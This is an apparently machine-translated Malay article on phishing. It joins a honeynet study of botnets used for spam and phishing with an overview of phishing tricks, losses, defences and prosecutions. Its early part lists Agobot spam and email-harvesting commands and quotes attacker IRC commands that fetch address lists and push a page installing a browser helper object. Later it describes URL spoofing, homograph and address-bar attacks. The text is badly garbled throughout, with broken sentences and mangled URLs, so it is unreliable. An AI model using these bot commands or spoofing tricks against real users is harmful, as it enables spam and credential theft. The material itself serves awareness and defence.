Beberapa versi dari perisian bot diambil selama projek penyelidikan ini memberikan kemampuan untuk jarak jauh memulakan v4/v5 socks proxy pada host dikompromikan. Socks mempunyai mekanisme proxy generik untuk TCP / aplikasi rangkaian berasaskan IP ( RFC 1.928 ) dan boleh digunakan untuk lalu lintas Internet yang paling popular proksi, seperti HTTP atau email SMTP.Jika seorang penyerang yang mempunyai akses ke sebuah botnet membolehkan fungsi socks proxy pada bot remote, mesin ini kemudian boleh digunakan untuk menghantar e-mel spam massa. Jika botnet mengandungi beribu-ribu host dikompromikan, penyerang kemudian boleh menghantar sejumlah besar email massal yang sangat mudah, sering dari berbagai alamat IP adalah dimiliki oleh pengguna PC rumahan yang tidak menaruh curiga.
Tidak adanya titik pusat kenalan dan julat melintasi batas-batas antarabangsa boleh membuat sangat sulit untuk menelusuri dan menghentikan kegiatan seperti itu, sehingga risiko rendah, tapi imbalannya berpotensi tinggi untuk spammer dan phisher. Mungkin heran, pemilik botnet akal mulai untuk menyasarkan kegiatan jenayah dan sekarang mungkin untukmenyewa sebuah botnet . Untuk biaya, pembekal botnet akan menyediakan pelanggan dengan senarai Socks v4 alamat IP pelayan dan port yang mampu.Ada didokumentasikan kes di mana botnet tersebut dijual kepada spammer sebagai spam-relay: " terbongkar: Trojan sebagai Spam Robots ". Beberapa perisian bot ditangkap juga melaksanakan fungsi khusus untuk panen-alamat e-mel atau untuk menghantar spam melalui bots. Senarai berikut menunjukkan beberapa perintah yang berkaitan dengan penghantaran spam / email phishing dilaksanakan dalam Agobot, sebuah bot yang popular digunakan oleh penyerang dan variasi secara teratur diambil selama penyelidikan honeynet:

• harvest.emails - "membuat bot mendapatkan senarai e-mel"
• harvest.emailshttp - "membuat bot mendapatkan senarai e-mel melalui HTTP"
• spam.setlist - "download senarai email"
• spam.settemplate - "download email template"
• spam.start - "bermula spamming"
• spam.stop - "berhenti spamming"
• aolspam.setlist - "AOL - download sebuah senarai e-mel"
• aolspam.settemplate - "AOL - download email template"
• aolspam.setuser - "AOL - set username"
• aolspam.setpass - "AOL - set password"
• aolspam.start - "AOL - bermula spamming"
• aolspam.stop - "AOL - berhenti spamming"

Maklumat lebih lanjut tentang bagaimana perintah ini dilaksanakan bolehditemui di sini di samping nota tentang sumber kod dari bot. Dengan bantuandengung, pelanggan IRC disesuaikan dibangunkan oleh Projek Honeynet Jerman, kami boleh mempelajari lebih lanjut tentang bagaimana bots digunakan untuk spam / serangan phishing e-mel dengan menyeludup pelanggan palsu ke dalam botnet menggunakan sambungan data yang dikumpul melalui serangan terhadap honeynets kami. Beberapa contoh khas kegiatan diamati adalah sebagai berikut.

Contoh 1
Dalam satu botnet tertentu kami mengamati seorang penyerang yang mengeluarkan perintah berikut (berharap perhatian bahawa URL yang telah dikaburkan):
. Mm http://www.example.com/email/fetch.php?4a005aec5d7dbe3b01c75aab2b1c9991 http://www.foobar.net/pay.html Joe did_u_send_me_this

Perintah mm (. "Email massa") adalah versi khusus dari perintah spam.start generik. Perintah ini menerima empat parameter:

1. URL untuk fail yang mengandungi beberapa alamat email.
2. Laman web untuk menyasarkan dalam e-mel spam - ini boleh menjadi web spam muzik-laman atau laman web phising.
3. Nama penghantar.
4. Subjek email.

Dalam hal ini, script fetch.php 30 kembali alamat email yang berbeza setiap kali itu dipanggil. Untuk masing-masing penerima, mesej email dibina yang diiklankan parameter kedua perintah. Dalam contoh ini, menunjuk ke laman-web yang cuba untuk memasang ActiveX komponen pada komputer korban.

Contoh 2
Dalam botnet lain yang kami amati pemasangan Browser Helper Objects pada PC korban:
[TOPIC] #spam9 :.open http://amateur.example.com/l33tag3/beta.html -s
Itu. Terbuka perintah setiap memberitahu bot untuk membuka laman web yang diminta dan memaparkan kepada korban. Dalam hal ini-laman web mengandungi Browser Helper Object (BHO) yang akan cuba untuk memasang sendiri pada komputer korban. Sebagai nama saluran menunjukkan, botnet ini juga digunakan untuk menghantar spam.

Contoh 3
Dalam botnet lain yang kami amati contoh propagasi spyware:

http://public.example.com/prompt.php?h=6d799fbeef3a9b386587f5f7b37f[...]
Link ini ditemui selama analisis malware ditangkap. Ini mengarahkan korban ke laman-web syarikat yang menawarkan "perisian bebas penghantaran iklan yang menyediakan iklan disasarkan menawarkan". Laman web ini mengandungi beberapa laman web yang cuba untuk memasang komponen ActiveX pada melawat pelanggan, mungkin adware atau spyware.



Manipulasi

Sebahagian besar kaedah phishing menggunakan beberapa bentuk penipuan teknikal direka untuk membuat link dalam e-mel (dan laman web palsu itu mengarah ke) akan muncul menjadi milik organisasi palsu. Salah eja URL atau penggunaan subdomain yang trik umum digunakan oleh phisher.

Dalam URL berikut contoh, http://www.yourbank.example.com/, nampak seolah-olah URL yang akan membawa anda ke bahagian contoh halaman yourbank; sebenarnya URL ini menunjuk pada "yourbank" (iaitu phishing) sebahagian daripada laman web misalnya.

Trik lain yang umum adalah untuk membuat jangkar teks untuk link tampaknya masih berlaku, bila link itu benar-benar pergi ke phisher 'halaman. Link contoh berikut, http://en.wikipedia.org/wiki/Genuine , tampaknya membawa anda ke rencana bertajuk "Asli"; mengklik justeru akan membawa anda ke rencana bertajuk "Penipuan". Di sisi sudut kiri bawah browser yang paling anda boleh melihat pratonton dan mengesahkan mana link ini akan membawa anda.

Sebuah kaedah lama spoofing link yang digunakan mengandungi '@' simbol, awalnya dimaksudkan sebagai cara untuk memasukkan nama pengguna dan password (bertentangan dengan standard). Sebagai contoh, link @ http://www.google.com members.tripod.com / boleh menipu pemerhati yang biasa menjadi percaya bahawa itu akan membuka laman pada www.google.com, padahal sebenarnya mengarahkan pelayar ke sebuah laman tentang members.tripod.com, dengan menggunakan nama pengguna dari www.Google. com: laman terbuka biasa, terlepas dari username yang disediakan.

URL tersebut telah dimatikan di Internet Explorer , sementaraMozilla Firefox dan Opera memaparkan mesej amaran dan memberikan pilihan untuk melanjutkan ke halaman atau membatalkan.

Masalah lebih lanjut dengan URL yang telah dijumpai dalam pengendalian nama domain pengantarabangsaan (MYS) di pelayar web , yang mungkin membolehkan identik visual alamat web untuk memimpin anda berbeza, mungkin berbahaya, website.

Terlepas dari publisiti yang mengelilingi cacat, dikenali sebagai MYS spoofing atau serangan homograf , phisher telah mengambil keuntungan dari risiko yang sama, dengan menggunakan buka redirectors URL pada halaman-halaman organisasi yang dipercayai untuk menyamarkan URL berbahaya dengan domain yang dipercayai.

Bahkan sijil digital tidak menyelesaikan masalah ini kerana sangat mungkin untuk phisher untuk membeli sijil yang sah dan kemudian mengubah kandungan untuk menipu website asal.


Penggelapan Filter

Phisher telah menggunakan gambar daripada teks untuk mempersulit anti-phishing penapis untuk mengesan teks biasa digunakan dalam e-mel phishing.

Pemalsuan Website

Setelah korban melawat halaman phising penipuan belum berakhir. Beberapa penipuan phishing menggunakan JavaScript arahan untuk menukar address bar . Hal ini dilakukan baik dengan menempatkan gambar URL sah atas address bar, atau dengan menutup panel alamat asli dan membuka yang baru dengan URL sah .

Seorang penyerang bahkan boleh menggunakan kelemahan di laman web sendiri itu script dipercayai terhadap korban. Jenis-jenis serangan (dikenali sebagai -site scripting lintas ) sangat bermasalah, kerana mereka mengarahkan pengguna untuk sign in di bank atau sendiri web perkhidmatan laman, di mana segala sesuatu dari alamat web ke sijil keselamatan yang betul muncul.

Pada kenyataannya, link ke website ini dibuat untuk melaksanakan serangan, sehingga sangat sulit untuk tempat tanpa pengetahuan khusus. Hanya seperti cacat digunakan pada tahun 2006 terhadap PayPal .

A Universal Man-in-the-middle Phishing Kit, ditemui oleh RSA Security , menyediakan digunakan antara muka yang mudah yang membolehkan phisher untuk meyakinkan menyalinkan halaman dan menangkap log-in detail masuk di laman web palsu.

Untuk mengelakkan phishing anti-teknik yang mengimbas laman web yang berkaitan dengan teks phishing, phisher telah mula menggunakanFlash berasaskan-laman web. Ini terlihat serupa dengan laman web yang sebenarnya, namun menyembunyikan teks dalam objek multimedia.

Telefon phishing

Tidak semua serangan phishing memerlukan website palsu. Mesej yang mengaku berasal dari bank kepada pengguna untuk menghubungi nombor telefon tentang masalah dengan akaun bank mereka. Sekali nombor telefon (yang dimiliki oleh phisher, dan yang disediakan olehVoice over IP ) adalah keluar, meminta kepada pengguna jasa untuk memasukkan nombor akaun dan PIN. Vishing (voice phishing) kadang-kadang menggunakan data-ID pemanggil palsu untuk memberikan kesan bahawa panggilan berasal dari organisasi yang dipercayai.


Teknik Lain

Serangan lain yang digunakan untuk meneruskan sukses adalah pelanggan untuk itu sah halaman bank, kemudian ke tempat tetingkap popup yang meminta mandat di atas laman web dengan cara yang muncul bank meminta maklumat sensitif.
Salah satu teknik phishing terkini tabnabbing . Ia mengambil keuntungan dari beberapa tab bahawa pengguna menggunakan dan diam-diam mengarahkan semula pengguna ke halaman yang terkena kesan.


Akibat Phishing


Kerosakan yang disebabkan oleh phishing berkisar dari penolakan akses kepada e-mel ke kerugian kewangan yang cukup besar.Dianggarkan bahawa antara bulan Mei 2004 dan Mei 2005, 1,2 juta pengguna komputer sekitar di Amerika Syarikat menderita kerugian akibat phishing, berjumlah sekitar US $ 929.000.000.

Amerika Syarikat kehilangan perniagaan dianggarkan US $ 2 bilion per tahun sebagai pelanggan mereka menjadi korban. Pada tahun 2007, serangan phishing meningkat. 3.600.000 orang dewasa kehilangan US $3200000000 dalam 12 bulan berakhir pada Ogos 2007. Microsoft tuntutan estimasi ini terlalu berlebihan dan menempatkan kerugian phishing tahunan di AS pada US $ 60 juta.

Di United Kingdom kerugian dari web-penipuan perbankan sebahagian besar dari phishing-hampir dua kali ganda menjadi GB £ 23.2m pada tahun 2005, dari GB £ 12.2m pada tahun 2004, sementara 1 dari 20 pengguna komputer mendakwa telah kehilangan ke phishing pada tahun 2005.

Sikap yang dipertimbangkan oleh perbankan Inggeris tubuh APACS adalah bahawa "pelanggan juga harus mengambil tindakan yang masuk akal sehingga mereka tidak terdedah kepada jenayah." Begitu juga, ketika banjir pertama serangan phishing Republik hit sektor perbankan yang Ireland pada bulan September 2006, Bank Ireland awalnya menolak untuk menutup kerugian yang diderita oleh pelanggan (dan masih berkeras bahawa dasar adalah untuk tidak melakukannya ), walaupun kerugian untuk lagu € 11.300 dibuat baik.
Anti phishing
Ada beberapa teknik yang berbeza untuk memerangi phishing, termasuk perundangan dan teknologi dicipta khusus untuk melindungi terhadap phising.



Tanggapan Sosial


Salah satu strategi untuk memerangi phishing adalah untuk melatih orang untuk mengenali usaha phishing, dan untuk menangani mereka.Pendidikan boleh berkesan, terutama di mana latihan memberikan jawapan terus. Satu taktik phising baru, yang menggunakan e-mel phishing yang disasarkan pada khusus syarikat, yang dikenali sebagai phishing tombak, telah dimanfaatkan untuk melatih individu di berbagai lokasi, termasuk Akademi Tentera Amerika Syarikat di West Point, NY.

Dalam sebuah percubaan 2004 Jun dengan tombak phishing, 80% dari 500 kadet West Point yang dihantar palsu e-mel telah tertipu untuk mendedahkan maklumat peribadi.

Orang boleh mengambil langkah-langkah untuk mengelakkan usaha phishing dengan sedikit memodifikasi kebiasaan browsing mereka.Ketika dihubungi mengenai akaun perlu menjadi "disahkan" (atau topik lain yang digunakan oleh phisher), itu adalah tindakan pencegahan yang masuk akal untuk menghubungi syarikat yang e-mel yang tampaknya berasal untuk menyemak bahawa e-mel yang sah.

Atau, alamat bahawa individu adalah yang asal tahu laman syarikat boleh ditaip ke dalam bar alamat pelayar, bukan percaya setiap hyperlink dalam mesej phishing disyaki.

Hampir semua mesej e-mel yang sah dari syarikat untuk pelanggan mereka mengandungi item dari informasi yang tidak tersedia untuk phisher. Beberapa syarikat, misalnya PayPal , selalu alamat pelanggan mereka dengan username mereka di e-mel, jadi jika sebuah alamat e-mel penerima secara generik ("pelanggan yang terhormat PayPal") itu mungkin suatu usaha phishing.

E-mel dari bank dan syarikat kad kredit sering memasukkan nombor akaun separa. Namun, kajian baru-baru ini telah menunjukkan bahawa masyarakat tidak biasanya membezakan antara beberapa angka pertama dan beberapa angka terakhir dari nombor akaun yang signifikan masalah-sejak beberapa digit pertama seringkali sama untuk semua pelanggan dari institusi kewangan .

Orang-orang dapat dilatih untuk memiliki kecurigaan mereka terangsang jika mesej tidak mengandungi maklumat personal terperinci. usaha Phishing pada awal 2006, namun, maklumat peribadi yang digunakan, yang membuatnya tidak selamat untuk menganggap bahawa kehadiran maklumat peribadi sendiri menjamin bahawa mesej yang sah.

Selain itu, kajian terkini menyimpulkan lain di bahagian bahawa kewujudan maklumat peribadi tidak tidak secara signifikan mempengaruhi tahap kejayaan serangan phishing, yang menunjukkan bahawa kebanyakan orang tidak memperhatikan butiran tersebut.

The Anti-Phishing Working Group , sebuah persatuan industri dan penguatkuasaan undang-undang, menyatakan bahawa teknik phishing konvensional boleh menjadi usang di masa depan kerana orang-orang semakin sedar teknik kejuruteraan sosial yang digunakan oleh phisher. Mereka meramalkan bahawa pharming dan lain-lain menggunakan dari malware akan menjadi lebih umum alat untuk mencuri maklumat.

Setiap orang boleh membantu mendidik masyarakat dengan menolak amalan-amalan yang selamat, dan menghindari yang berbahaya.Malangnya, bahkan-pemain yang dikenali juga dikenali untuk menghasut pengguna untuk perilaku yang berbahaya, misalnya dengan meminta pengguna mereka untuk mendedahkan password mereka untuk perkhidmatan pihak ketiga, seperti email.


Tanggapan Teknikal

Langkah-langkah Anti-phishing telah dilaksanakan sebagai ciri-ciri tertanam dalam browser, sebagai perluasan atau toolbar untuk browser, dan sebagai sebahagian daripada prosedur login website. Berikut adalah beberapa pendekatan utama untuk masalah ini.

Membantu untuk mengenalpasti laman-laman web yang sah

Kebanyakan laman web yang disasarkan untuk phishing adalah halaman dalam yang bermaksud bahawa SSL dengan PKI kriptografi yang kuat digunakan untuk pengesahan pelayan, di mana website URL digunakan sebagai identifier. Secara teori seharusnya mungkin untuk pengesahan SSL untuk digunakan untuk mengesahkan halaman bagi pengguna, dan ini adalah SSL desain dan v2 meta browsing dalam.Tapi dalam prakteknya, ini adalah trik mudah.

Kelemahan dangkal adalah bahawa keselamatan antara muka pengguna pelayar (UI) tidak cukup untuk menangani ancaman yang kuat hari ini. Ada tiga bahagian untuk mengamankan pengesahan menggunakan TLS dan sijil: menunjukkan bahawa sambungan dalam mod otentik, menunjukkan pengguna laman web yang disambungkan ke, dan menunjukkan yang kuasa mengatakan itu laman web ini. Ketiga diperlukan untuk pengesahan, dan perlu disahkan oleh / kepada pengguna.

Sambungan Aman. Display standard untuk browsing dalam tahun 1990-an pertengahan hingga pertengahan tahun 2000-an adalah gembok.Pada tahun 2005, Mozilla menerjunkan URL Bar kuning 2005 sebagai penunjuk yang lebih baik dari Sambungan yang selamat. Inovasi ini kemudian terbalik kerana sijil EV , yang menggantikan sijil tertentu mempunyai tingkat tinggi pengesahan identiti organisasi dengan layar hijau, dan sijil lain dengan favicon diperpanjang tempat biru di sebelah kiri bar URL (selain switch daripada "http" menjadi "https" pada url itu sendiri).

Pengguna laman web ini diharapkan untuk mengesahkan bahawa nama domain di's URL Bar, pelayar sebenarnya di mana mereka berniat untuk pergi. URL boleh terlalu kompleks untuk dihuraikan dengan mudah. Pengguna sering tidak tahu atau mengenali URL dari halaman yang sah mereka berniat untuk menyambung ke, sehingga pengesahan menjadi bermakna.

Sebuah keadaan untuk pengesahan pelayan yang bermaksud adalah memiliki identifier pelayan yang berarti bagi pengguna; banyak e-dagang halaman akan mengubah nama domain dalam mengatur keseluruhan tapak mereka, menambah peluang untuk kebingungan. Hanya memaparkan nama domain untuk melawat halaman kerana beberapa toolbar anti-phishing lakukan adalah tidak cukup.

Beberapa pelayar yang lebih baru, seperti Internet Explorer 8 , memaparkan semua URL dalam abu-abu, hanya dengan nama domain sendiri di hitam, sebagai sarana untuk membantu pengguna adalah dalam mengenalpasti URL penipuan.

Sebuah pendekatan alternatif adalah petname sambungan untuk Firefox yang membolehkan pengguna di label jenis mereka sendiri untuk laman web, sehingga mereka nantinya dapat mengenali ketika mereka telah kembali ke halaman.

Jika laman web ini tidak dikenali, maka software baik dapat memberi amaran kepada pengguna atau memblok halaman sekaligus. Centric ini ialah pengurusan identiti-identiti pengguna pelayan. Beberapa menyarankan bahawa citra grafik yang dipilih oleh pengguna lebih baik dari sebuah petname.

Dengan munculnya sijil EV , pelayar sekarang biasanya memaparkan nama organisasi dalam warna hijau, yang jauh lebih jelas dan mudah-mudahan lebih konsisten dengan harapan pengguna. Malangnya, penjual, pelayar telah memilih untuk memaparkan terkemuka had ini hanya untuk sijil EV , sehingga pengguna untuk mengurus dirinya sendiri dengan semua sijil lain.

Siapa Pihak Berkuasa. Browser perlu negara yang kuasa yang membuat tuntutan yang pengguna disambungkan ke. Pada tahap yang paling mudah, kuasa tidak disebutkan, dan kerana itu, pelayar kuasa, sejauh pengguna yang bersangkutan. Para penjual pelayar memuat tanggung jawab ini dengan mengendalikan pendaftaran akar CA diterima. Ini adalah amalan piawai saat ini.

Masalah dengan hal ini adalah bahawa tidak semua pihak berkuasa pensijilan (CA) menggunakan pemeriksaan sama baik atau berlaku, terlepas dari usaha oleh penjual pelayar untuk mengawal high. Juga tidak semua CA melanggan ke model yang sama dan konsep bahawa sijil hanya sekitar pengesahan organisasi e-dagang Pengeluaran.

Sijil adalah nama yang diberikan untuk-nilai sijil yang rendah yang disampaikan pada kad kredit dan pengesahan email; kedua ini dengan mudah sesat oleh penipu. Oleh kerana itu, sebuah laman web bernilai tinggi boleh dengan mudah palsu dengan sijil yang sah yang disediakan oleh CA lain. Hal ini dapat kerana CA adalah di bahagian lain dunia, dan tidak familiar dengan halaman e-dagang bernilai tinggi, atau bisa juga bahawa rawatan tidak diambil sama sekali.Sebagai CA hanya dibebankan dengan melindungi para pelanggan sendiri, dan bukan pelanggan CA lain, cacat ini melekat dalam model.

Solusi untuk ini adalah bahawa pelayar harus menunjukkan, dan pengguna harus akrab dengan, nama kuasa. Ini menyajikan CA sebagai sebuah tanda, dan memungkinkan pengguna untuk mempelajari beberapa CA bahawa dia akan datang ke dalam kenalan dalam negara dan sektor-nya. Penggunaan tanda juga sangat penting untuk menyediakan CA dengan insentif untuk meningkatkan menyemak mereka, sebagai pengguna akan mempelajari tanda dan permintaan pemeriksaan yang baik untuk halaman bernilai tinggi.

Penyelesaian ini pertama kali mempraktikkan dalam IE7 versi awal, ketika memaparkan sijil EV . Pada layar itu, CA mengeluarkan dipaparkan. Ini merupakan kes yang terpencil, tetapi. Ada ketahanan terhadap CA dicap di krom, mengakibatkan fallback ke tahap yang paling mudah di atas: pelayar pengguna wewenang

kelemahan yang mendasar dalam model keselamatan dalam pencarian

Percubaan untuk meningkatkan keselamatan UI telah menghasilkan keuntungan, tetapi juga terkena cacat mendasar dalam model keselamatan. Penyebab yang mendasari kegagalan pengesahan SSL untuk dipekerjakan baik di browsing dalam banyak dan terjalin.

Keselamatan sebelum ancaman nyata. Aman browsing Oleh itu dimasukkan ke tempat sebelum ancaman itu, keselamatan paparan kalah dalam "perang real estate" dari awal, pelayar. Rancangan asal dari Netscape termasuk paparan terkemuka nama halaman dan nama CA, tapi ini dijatuhkan pada keluaran pertama. Pengguna sekarang sangat berpengalaman dalam tidak menyemak maklumat keselamatan sama sekali.

Klik-thru sindrom. Namun, peringatan untuk dikonfigurasikan halaman buruk terus, dan tidak turun-undian. Jika sijil mengalami error di dalamnya (domain nama tidak berpadanan, luput), maka biasanya akan melancarkan pelayar popup untuk memberi amaran kepada pengguna. Sebagai alasan itu umumnya sebuah misconfiguration kecil, pengguna belajar untuk memotong amaran, dan sekarang, pengguna terbiasa untuk melayan semua amaran dengan penghinaan yang sama, sehingga-thru sindrom Klik.

Sebagai contoh, Firefox 3 mempunyai klik proses 4 untuk menambah pengecualian, tetapi telah terbukti diabaikan oleh pengguna yang berpengalaman dalam kes nyata dari MITM. Bahkan saat ini, kerana sebahagian besar akan peringatan untuk misconfigurations tidak MITMs nyata, sukar untuk melihat klik-thru bagaimana sindrom akan pernah dielakkan.

Kurangnya minat. Faktor lain yang mendasari adalah kurangnya sokongan untuk virtual hosting. Penyebab khusus adalah kurangnya sokongan untuk Indikasi Nama Server di webservers TLS, dan kos dan ketidaknyamanan untuk mendapatkan sijil.

Hasilnya adalah bahawa penggunaan pengesahan terlalu langka untuk menjadi apa pun kecuali kes khas. Hal ini telah mengakibatkan kurangnya pengetahuan dan sumber daya dalam pengesahan dalam TLS, yang pada gilirannya bermakna bahawa usaha oleh penjual, pelayar anda meng-upgrade Uis keselamatan mereka telah lambat dan tak bersemangat.

Komunikasi lateral. Model keselamatan untuk pelayar dalam banyak peserta yang meliputi: pengguna, penjual, pelayar, pengembang, CA, auditor, penjual webserver, halaman e-dagang, regulator (contohnya, FDIC), dan standard keselamatan jawatankuasa. Ada kurangnya komunikasi antara kumpulan-kumpulan berbeza yang komited untuk model keselamatan.

Contohnya, walaupun pemahaman pengesahan kuat pada peringkat protokol jawatankuasa IETF, Mesej ini tidak mencapai kumpulan UI. penjual Webserver tidak memprioritaskan Nama Server Indikasi (TLS / SNI) memperbaiki, tidak melihatnya sebagai suatu memperbaiki keselamatan, tetapi bukan ciri baru. Dalam prakteknya, semua peserta melihat kepada orang lain sebagai sumber kegagalan menuju phishing, maka perbaikan tempatan tidak diprioritaskan.

Hal-hal sedikit meningkat dengan Forum CAB, sebagai kumpulan yang termasuk vendor browser, juruaudit dan CA. Tapi kumpulan tidak memulakan dengan cara terbuka, dan hasil dari kepentingan komersil menderita pemain pertama, serta kurangnya paritas antara peserta. Bahkan saat ini, forum CAB tidak terbuka, dan tidak melibatkan wakil dari CA kecil, akhir-pengguna, pemilik e-dagang, dan lain-lain.

Standard kesesakan. Vendor komited untuk standard, yang menghasilkan kesan outsourcing ketika datang ke keselamatan. Walaupun ada banyak dan baik percubaan dalam meningkatkan keselamatan UI, ini belum diadopsi kerana mereka tidak lalai, atau bertentangan dengan standard. model Ancaman dapat kembali mencari diri di sekitar sebulan; standard Keselamatan memakan masa sekitar 10 tahun untuk menyesuaikan.

CA Mulia model mekanisme. Kawalan dipekerjakan oleh para peniaga di atas pelayar CA belum dikemaskini secara substansial; model ancaman ini. kawalan dan proses high daripada CA adalah kurang sesuai untuk perlindungan pengguna dan pengalamatan aktual dan ancaman saat ini.
Proses Audit sangat memerlukan pembaharuan. Manual baru-baru ini didokumentasikan EV model ini secara lebih terperinci, dan mendirikan sebuah patokan yang baik, tetapi tidak menggalakkan perubahan yang mendasar perlu dilakukan.

memberi amaran kepada pengguna ke laman web palsu

Pendekatan lain yang popular untuk phishing berjuang adalah menjaga senarai laman phising dikenali dan untuk memeriksa website dengan senarai. IE7 pelayar Microsoft , Mozilla Firefox 2.0, Safari 3.2, dan Opera semuanya mengandungi jenis-phishing tindakan anti. Firefox 2 digunakan Google software anti-phishing. Opera 9.1 menggunakan hidup blacklist dari PhishTank dan GeoTrust , serta hidupWhitelist dari GeoTrust .

Beberapa implementasi dari pendekatan ini menghantar URL yang dikunjungi kepada perkhidmatan pusat untuk diperiksa, yang telah menyuarakan keprihatinan mengenai privasi. Menurut sebuah laporan pada akhir tahun 2006 Mozilla, Firefox 2 dijumpai lebih berkesan daripada Internet Explorer 7 di mengesan halaman penipuan dalam sebuah kajian oleh syarikat ujian perisian bebas.

Suatu pendekatan diperkenalkan pada pertengahan 2006 melibatkan beralih kepada perkhidmatan DNS khusus yang menapis dikenali phishing domain: ini akan bekerja dengan pelayar apapun, dan mirip pada prinsipnya untuk menggunakan host file untuk menyekat iklan web.

Untuk mengurangkan masalah halaman phising meniru halaman korban oleh embedding gambar (seperti logo), beberapa pemilik laman telah menukar gambar-gambar untuk menghantar mesej kepada pengunjung bahawa laman mungkin palsu. Gambar boleh dipindahkan ke nama fail baru dan asli diganti secara kekal, atau pelayan dapat mengesan bahawa gambar tidak diminta sebagai sebahagian daripada browsing biasa, dan bukannya menghantar gambar amaran


Memperbanyak Login


Bank of America 's [adalah salah satu dari beberapa yang meminta pengguna untuk memilih gambar peribadi, dan memaparkan gambar-pengguna yang dipilih dengan bentuk yang meminta password. Pengguna perkhidmatan online bank diperintahkan untuk memasukkan password hanya ketika mereka melihat gambar mereka yang dipilih.

Namun, kajian terkini menunjukkan beberapa pengguna menahan diri dari memasukkan password mereka ketika gambar tidak hadir. Selain itu, ciri ini (seperti bentuk-bentuk lain dari dua faktor pengesahan) rentan terhadap serangan lain, seperti yang diderita oleh bank Nordea Scandinavia pada akhir tahun 2005, dan Citibank pada tahun 2006.
Sebuah sistem yang sama, di mana sebuah "automatik yang dihasilkan Identity Cue" terdiri daripada sebuah kata berwarna di dalam kotak berwarna dipaparkan kepada setiap pengguna laman web, sedang digunakan di institusi kewangan lain.

Keselamatan kulit adalah teknik berkaitan yang melibatkan overlay gambar yang dipilih pengguna ke borang login sebagai isyarat bentuk visual yang sah. Berbeza dengan skim gambar website berasaskan Namun, gambar itu sendiri dibahagikan hanya antara pengguna dan pelayar, dan tidak antara pengguna dan laman web. Skema ini juga bergantung pada protokol pengesahan timbal balik, yang membuatnya lebih rentan terhadap serangan yang mempengaruhi skim pengesahan pengguna sahaja.

Menghilangkan phishing mail

penapis spam khusus boleh mengurangkan jumlah e-mel phishing yang mencapai petutur inbox mereka. Pendekatan ini mengandalkan mesin pembelajaran dan pemprosesan bahasa semulajadi pendekatan untuk mengklasifikasikan phishing e-mel.


Pemantauan dan takedown

Beberapa syarikat menawarkan bank dan organisasi lain kemungkinan menderita penipuan phishing perkhidmatan keliling-jam untuk memantau, menganalisis dan membantu mematikan laman web phising. Individu boleh menyumbang dengan melaporkan phishing untuk kedua relawan dan kelompok industri, seperti PhishTank. Individu juga boleh menyumbang dengan melaporkan phishing cuba telefon ke Telefon Phishing, Federal Trade Commission.

Protokol Gunakan butang Password perjanjian-otentik

Protokol-protokol ini membolehkan password lemah untuk memberikan keselamatan yang kuat bahkan dengan seorang lelaki di tengah. Kata laluan tidak pernah dihantar ke pelayan, juga tidak ada maklumat yang akan membolehkan pelayan bermusuhan untuk melakukan serangan brute force. Mereka secara berkesan membuat phising mustahil, tanpa perlu sijil PKI, amaran pengguna atau mekanisme lain.

Namun, pada Jan 2010 mereka tidak dilaksanakan dalam pelayar banyak digunakan, walaupun ini boleh berubah. Jika mereka banyak diterapkan dan digunakan mereka boleh merosakkan industri anti-phishing substansial.

Hukum tanggapan
Pada tarikh 26 Januari 2004, US Federal Trade Commission mengemukakan tuntutan pertama terhadap phisher disyaki. Terdakwa, seorang remaja California, dipercayai mencipta sebuah laman web yang direka supaya kelihatan seperti di laman America Online, dan menggunakannya untuk mencuri maklumat kad kredit.

Negara-negara lain telah diikuti ini memimpin dengan menelusuri dan menangkap phisher. Seorang gembong phishing, Valdir Paulo de Almeida, ditangkap di Brazil untuk memimpin salah satu cincin yang terbesar kejahatan phishing, yang dalam dua tahun mencuri antara AS $ 18 juta dan US $ 37 juta.

Inggeris kuasa dipenjara dua orang pada Jun 2005 untuk peranan mereka dalam sebuah penipuan phishing, dalam kes berhubung ke US Secret Service Operasi Firewall, yang disasarkan terkenal "carder" website. Pada tahun 2006 lapan orang ditangkap oleh polis Jepun kerana disyaki phishing palsu penipuan dengan membuat laman web Yahoo Jepun, jaring sendiri ¥ 100,000,000 (US $ 870.000). Penangkapan berterusan di 2006 dengan FBI Operasi Cardkeeper menahan sekumpulan enam belas di Amerika Syarikat dan Eropah.

Di Amerika Syarikat, Senator Patrick Leahy memperkenalkan undang-undang Anti-Phishing tahun 2005 di Kongres pada tarikh 1 Mac 2005. RUU ini, jika telah ditetapkan menjadi undang-undang, akan dikenakan penjahat yang mencipta laman web palsu dan menghantar e-mel palsu untuk menipu pelanggan untuk denda sampai US $ 250.000 dan penjara sehingga lima tahun. Inggeris menguatkan arsenal undang-undang terhadap phishing dengan undang-undang, Penipuan 2006 yang memperkenalkan suatu pelanggaran umum penipuan yang boleh membawa sampai hukuman penjara sepuluh tahun, dan melarang pembangunan atau pemilikan phishing kit dengan maksud untuk melakukan penipuan.

Syarikat juga telah bergabung dengan usaha untuk menindak phishing. Pada tarikh 31 Mac 2005, Microsoft mengajukan tuntutan undang-undang persekutuan 117 di Mahkamah Daerah AS untuk Daerah Barat Washington. Tuntutan menuduh "John Doe" terdakwa untuk mendapatkan password dan maklumat rahsia. Mac 2005 juga melihat satu kerjasama antara Microsoft dan kerajaan Australia pegawai penguatkuasa undang-undang pengajaran cara untuk memerangi pelbagai kejahatan cyber, termasuk phishing.

Microsoft mengumumkan lebih banyak direncanakan 100 tuntutan undang-undang di luar AS pada Mac 2006, diikuti dengan dimulainya itu, pada bulan November 2006, sejumlah 129 tuntutan undang-undang pencampuran tindakan jenayah dan sivil. AOL diperkuatkan usaha melawan phishing di awal tahun 2006 dengan tiga tuntutan undang-undang mencari total US $ 18 juta di bawah tahun 2005 pindaan kepada Virginia Computer Crimes Act, dan Earthlink telah menyertai dalam dengan membantu untuk mengenalpasti enam lelaki kemudian diisi dengan phishing penipuan di Connecticut.

Pada bulan Januari 2007, Jeffrey Brett Goodin California menjadi terdakwa pertama yang dijatuhkan hukuman oleh dewan juri di bawah peruntukan undang-undang CAN-SPAM tahun 2003. Dia dijumpai bersalah menghantar ribuan e-mel kepada pengguna America Online, sedangkan menyamar sebagai jabatan penagihan AOL, yang mendorong pelanggan untuk menghantar maklumat peribadi dan kad kredit. Menghadapi kemungkinan 101 tahun penjara untuk pelanggaran CAN-SPAM dan jumlah sepuluh lain termasuk penipuan kawat, penyalahgunaan kad kredit, dan penyalahgunaan tanda dagang AOL, ia dijatuhi hukuman untuk melayani 70 bulan. Goodin telah ditahan sejak gagal tampil untuk sidang dahulu.

Bagaimana cara mengenalpasti laman web phising?

